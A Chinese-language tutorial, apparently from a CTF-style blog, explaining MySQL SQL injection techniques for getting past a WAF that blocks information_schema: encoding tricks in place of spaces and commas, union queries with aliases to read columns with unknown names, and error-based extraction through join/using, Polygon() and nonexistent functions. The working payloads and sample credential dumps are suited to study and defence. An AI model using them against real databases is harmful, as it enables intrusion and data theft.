某个地方有注入,但waf拦截了information_schema、columns、tables、database、schema等关键字或函数,我们如何去获取当前表名,字段名和库名呢?
题目过滤空格和逗号,空格使用%0a,%0b,%0c,%0d,%a0,或者直接使用括号都可以绕过,逗号使用join绕过;
存放flag的字段名未知,information_schema.columns也将表名的hex过滤了,即获取不到字段名;这时可以利用联合查询,让其在已知字段名下出现;
示例
mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------+
| 1 | 2 | 3 | 4 |
+---+-------+----------+-------------+
| 1 | 2 | 3 | 4 |
| 1 | admin | admin888 | 110@110.com |
| 2 | test | test123 | 119@119.com |
| 3 | cs | cs123 | 120@120.com |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4 |
+-------------+
| 4 |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+-------------+
4 rows in set (0.03 sec)
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
+-------------+
| 4 |
+-------------+
| 120@120.com |
+-------------+
1 row in set (0.01 sec)
mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id | username | password | email |
+-------------+----------+----------+-------------+
| 1 | admin | admin888 | 110@110.com |
| 120@120.com | 1 | 1 | 1 |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)
select name from test where id=1 and (select * from (select * from test as a join test as b) as c);
爆出第一个字段
原理:使用别名时,表中不能出现相同的字段名,于是利用join把表扩充成两份,别名表c中查询到重复字段,成功报错。
接着,利用using爆其他字段
select name from test where id=1 and (select * from (select * from test as a join test as b using(id)) as c);
得到其他字段
select name from test where id=1 and (select * from (select * from test as a join test as b using(id,name)) as c);
通过using所有已知column name,去获取下一个
……
using等价于join操作中的on,例如a和b根据id字段关联,那么以下等价
using(id)
on a.id=b.id
以下2个实例等价:
select a.name,b.age from test as a join test2 as b on a.id=b.id
select a.name,b.age from test as a join test2 as b using(id)
Polygon从多个LineString或WKB LineString参数 构造一个值 。如果任何参数不表示LinearRing(也就是说,不是一个封闭和简单的LineString),返回值就是NULL
如果传参不是linestring的话,就会爆错,而当如果我们传入的是存在的字段的话,就会爆出已知库、表、列。
select * from users where uid =1-a();
原理:一个库中存在不同的系统或自定义函数,如果函数不存在,他就会爆出这个库没有此函数。
原文:https://www.cnblogs.com/vv3b/p/15034071.html